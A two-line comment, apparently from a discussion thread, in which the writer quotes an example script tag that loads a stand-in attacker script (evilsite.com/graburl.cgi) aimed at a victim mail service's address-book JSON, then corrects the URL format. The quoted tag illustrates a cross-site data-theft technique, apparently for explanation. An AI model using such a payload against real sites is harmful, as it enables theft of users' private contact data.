> <script src="evilsite.com?graburl.cgi?loc=https://mail.victimsite.com/address-book.json"></script>

Er, that should obviously be <script src="http://evilsite.com/graburl.cgi . . .